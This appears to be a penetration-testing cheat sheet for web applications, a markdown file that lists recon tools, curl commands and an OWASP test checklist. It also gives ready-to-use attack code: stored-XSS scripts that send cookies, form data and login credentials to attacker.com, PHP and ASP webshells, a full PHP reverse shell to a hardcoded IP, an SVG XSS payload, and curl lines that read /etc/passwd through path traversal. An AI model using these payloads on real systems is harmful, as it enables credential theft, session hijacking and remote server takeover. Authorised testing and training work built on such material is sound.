Skip to content

api_web.md

Latest commit

 

History

History
483 lines (402 loc) · 12.2 KB

api_web.md

File metadata and controls

483 lines (402 loc) · 12.2 KB

APIs & Web Applications

API WEB Tools

Burp Suite Certified Practitioner WebApp Studies

OWASP

Web App Testing

TCP 80/443 HTTP - Web Applications

  • Subdomain discovery tool

  • subfinder -d groupservice.co.za -all -o subdomains.txt

  • ffuf

ffuf -c -w ~/Downloads/wordlists/9-big.txt -u http://eezy.box/secret/FUZZ -e .git,.txt,.json,.php

ffuf -c -ic -w 0-common-with-mylist.txt -u https://point.bank.com/FUZZ -recursion -mc 200,201,300-307,400,401,403,405,415

gobuster vhost -u http://jeff.thm -w /opt/SecLists/Discovery/DNS/namelist.txt

dirsearch -u http://target.net/ -w directory-list-2.3-medium.txt -x 400,401,403 -e *
  • feroxbuster
feroxbuster -u https://target.net/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html -t 200 -C 400,404,401,403,429

feroxbuster -u https://target.net/ -H 'Cookie: acceptCookies=y; _ga=GA1.3.1.1; nmstat=04dafef3; _ga_1=1$o2$g1$1$$h0; XSESSIONID=123-123-123; TS01f7a886=123'
  • wpscan
wpscan --url jack.thm --enumerate ap,at,cb,dbe --api-token rfzQVk...

cewl -w collect-words-from-fuse.txt -d 10 -m 1 http://fuse.fabricorp.local/papercut/logs/html/
cewl -w oscp-words.txt -d 10 -m 5 http://192.168.56.151/
cewl -w collect-more-words.txt -d 10 -m 1 http://10.10.10.188/author.html

## sort and unique
sort collect-words-from-fuse.txt | uniq -u > unique_list.txt

cewl https://target.co/web/porta/ -w wordlist.txt --header 'Cookie: acceptCookies=y; XSESSIONID=123-123-123; TS01=123'
  • wget
  • wget http://target.net:9191/data --http-user=admin --http-password=Fabricorp013

curl

  • send via proxy intercept
curl -x 127.0.0.1:8080 -sk -X GET "https://target.com/external" -H $'Accept: application/json, text/plain, */*' -H $'Content-Type: application/json' -H $'User-Agent: command-line-test' -H $'Ocp-Apim-Subscription-Key: snip' -H $'Authorization: Bearer snip.snip.snip'

curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile

curl -d "user=lay&pass=simple&submit=submit" -X POST http://ctf100.thm/hidden/	

curl --user offsec:elite 192.168.68.46:242/pwn.php

curl http://192.168.164.127:33033/users/4/edit --cookie _userpro_medjed_session=27M1j4motXCY8< snip >giqG%2F

curl http://muddy.ugc/webdav/php-reverse-shell.php -u administrant:sleepless

curl http://authenticate.thm:5000/protected -H "Content-Type: application/json" -H "Authorization: JWT JWT.JWT.JWT"

curl http://nappa.offsec:8080/register | grep -ie 'href\|<!-\|pass' -A1 -B1

curl http://hunit.offsec:8080/article/the-taste-of-rain | grep -ie '<!-' -A 1 -B 2

curl 10.11.1.71 -s -L | html2text -width '99' | uniq

curl --user offsec:elite -v http://authby.offsec:242/webshell.php?cmd=whoami --proxy http://127.0.0.1:8080

curl http://authenticate.thm:8888/register/submit --data "user=%20darren&email=fake&password=12345" -c cookies -b cookies
  • Browsing web application
  • wappalyzer
  • httpOnly False
  • javascript
  • back ticks
  • login page
  • robots.txt
  • domain names
  • source code & Dev Tools
  • whatweb
whatweb challenge.sensepost.ninja
  • davtest
davtest -auth fmcsorley:CrabSharkJellyfish192 -url http://192.168.159.122/ -uploadfile cmd.asp -uploadloc /cmd.asp
  • wafw00f
wafw00f http://target.net/
  • sslscan
sslscan xor-app59.xor.com

  • owasp-zap

  • HTTPX Request Enumeration httpx https://www.groupservice.co.za

  • Tools & Methods

  • gobuster

  • unshorten tiny URL

  • directory Brute Force

  • robots.txt

  • cookies

  • DNS

  • dirb

  • Burp Suite Extensions

    • Turbo Intruder
    • Backslash Powered scanner
    • Param Miner
    • Active Scan++
    • JS Link Finder
    • JWT Editor / Jason Web Token
    • HTTP Request Smuggler
    • Host Header Inchecktion
    • Kerberos Authentication
    • PwnFox For Chromium - Browser profiles
    • JSpector - passively crawls JavaScript Files
    • SQLiPy - SQLMAP

  • curl

  • Fingerprint Web Server-INFO002

  • Fingerprint Web App-INFO009

  • Configuration (CONFIG)

  • Sensitive Information-CONFIG004

  • Admin Interfaces-CONFIG005

  • Identity (IDENT)

  • User Registration-IDENT002

  • Authentication (AUTHN)

  • account lock-AUTHN003

  • Weak password policy-AUTHN007

  • Weak password change reset-AUTHN009

  • Authorization (AUTHZ)

  • IDOR-AUTHZ004

  • Session (SESS)

  • Session Manage Schema SESS001

  • Input Validation (INPVAL)

  • reflected XSS-INPVAL001

  • SQL Injection-INPVAL005

  • SQLMAP

  • SQLi Payloads

  • UNION Attacks

  • Stored XSS

  • Session Hijacking with Navigation Hooking

<script>
document.addEventListener('click', function(e) {
	const anchor = e.target.closest('a');
	if (anchor && anchor.href) {
		e.preventDefault();
		// Exfiltrate before navigation
		fetch('https://attacker.com/log?cookie=' + document.cookie + '&url=' + anchor.href);
		// Continue to destination to avoid suspicion
		setTimeout(() => window.location = anchor.href, 100);
	}
}, true);
</script>
  • Captures login credentials, payment info, personal data from all forms
<script>
document.addEventListener('submit', function(e) {
	const form = e.target;
	const formData = new FormData(form);
	const data = {};
	
	for(let [key, value] of formData.entries()) {
		data[key] = value;
	}
	
	// Exfiltrate form data (credentials, PII, etc.)
	fetch('https://attacker.com/harvest', {
		method: 'POST',
		body: JSON.stringify(data)
	});
	
	// Allow form to continue normally
}, true);
</script>
  • DOM Manipulation for Phishing, Credential harvesting that's nearly impossible for users to detect
<script>
// Wait for login form to appear
const observer = new MutationObserver(function(mutations) {
	mutations.forEach(function(mutation) {
		const loginForm = document.querySelector('form[action*="login"]');
		if (loginForm) {
			// Change form action to attacker server
			loginForm.setAttribute('action', 'https://attacker.com/phish');
			
			// Or duplicate and hide original
			const fakeForm = loginForm.cloneNode(true);
			fakeForm.addEventListener('submit', function(e) {
				e.preventDefault();
				const formData = new FormData(fakeForm);
				fetch('https://attacker.com/creds', {
					method: 'POST',
					body: formData
				}).then(() => {
					// Submit to real endpoint after exfiltration
					loginForm.submit();
				});
			});
		}
	});
});

observer.observe(document.body, { childList: true, subtree: true });
</script>
  • Code Injection-INPVAL012
  • Server-side template injection
  • Splitting/Smuggling-INPVAL016
  • Error Handling (ERR)
  • Weak Cryptography (CRYPST)
  • Padding Oracle CRYPST002
  • Business Logic (BUSLOGIC)
  • Work Flows-BUSLOGIC006
  • Client Side (Client)
  • DOM Cross site scripting-CLIENT001
  • Resouce Manipulation CLIENT006
  • CORS CLIENT007
  • ClickJacking CLIENT009

WebShells

  • webshell.php
<?php system($_GET['cmd']); ?>
  • webshell.php
<?php
// Simple PHP webshell
// Access: shell.php?cmd=whoami
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
  • webshell.aspx
<% eval request('cmd') %>
  • IIS webshell.aspx
<!-- Working on latest IIS  -->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

Reverse Shell

  • PH Reverse Shell
<?php
// PHP Reverse Shell to 192.168.111.2:4444
// Start listener: nc -lvnp 4444

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.111.2';  // CHANGE THIS
$port = 4444;           // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'cmd.exe';     // Windows
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0);
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise");
}

chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("pipe", "w")
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>

File Upload Samples

  • EICAR Payload
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • SVG XSS Image Payload
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS!");
   </script>
</svg>

Referance